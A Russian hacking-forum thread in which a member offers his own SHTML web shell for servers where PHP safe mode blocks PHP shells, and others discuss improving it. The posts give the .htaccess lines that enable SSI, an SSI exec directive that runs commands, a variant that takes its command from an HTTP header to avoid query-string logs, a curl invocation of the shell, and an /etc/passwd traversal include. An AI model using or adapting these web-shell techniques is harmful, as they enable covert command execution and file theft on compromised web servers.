Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.11.2009, 22:49
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Т.е. никогда 
|
|
|
10.12.2009, 22:46
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Web-шелл, написанный на shtml.
Автор - я.
Может весьма пригодиться, когда в конфигурации PHP стоит Safe-Mode=ON или какие-то функции отключены, то есть php-шелл не полнофункционален.
Функционал:
+ Общая информация
+ Все переменные окружения
+ Выполнение shell-кода
+ Просмотр файлов (cat)
+ SSI-инклуд произвольных файлов
Для того, чтобы mod_include работал, в .htaccess должно быть прописано (если соответствующая конфигурация не установлена в httpd.conf):
Код:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes
Скачать
Последний раз редактировалось Root-access; 10.12.2009 в 22:58..
|
|
|
|
10.12.2009, 23:00
|
|
Участник форума
Регистрация: 04.12.2005
Сообщений: 202
Провел на форуме:
414834
Репутация:
99
|
|
2 Root-access
А шелл выложить без регистрации не понятно на каком форуме возможно?
update: хм, теперь нормально.
|
|
|
|
10.12.2009, 23:09
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
шелл очень сырой имхо,надо доработать,все основывается на командной строке
|
|
|
|
10.12.2009, 23:42
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Xcontrol212
шелл очень сырой имхо,надо доработать,все основывается на командной строке
Ну с SSI мало что сделаешь, разумеется всё основывается на командной строке, на то это и шелл.
По-моему наоборот, там даже лишнее, в принципе одной строки даже хватило бы)
Кстати: команды со спецсимволами слешируются, поэтому их лучше вписывать в сам код, добавив строчку:
Код:
<!--exec cmd=">команда<" -->
|
|
|
|
26.12.2009, 02:57
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
блин неужто сработало где Included file: /../../../../../../../etc/passwd ?
ЗЫ вобще юзать гет и палево в query_string- некошерно
<!--#exec cmd=$HTTP_CMD -->
curl -H 'CMD: id' http://localhost/ssishell.shtml
Последний раз редактировалось ShAnKaR; 26.12.2009 в 03:27..
|
|
|
|
26.12.2009, 21:04
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от ShAnKaR
блин неужто сработало где Included file: /../../../../../../../etc/passwd ?
ЗЫ вобще юзать гет и палево в query_string- некошерно
Хм, нет конечно, не сработало. Я перепутал - /etc/passwd должен был не инклудиться, а идти в cat.
Да, некошерно конечно. Вообще можно переписать весь шелл в связке с javascript, чтоб не было такого палева.
С другой стороны, самое главное в этом шелле - командная строка. Не знаю, нужно ли вообще-то что-то большее.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
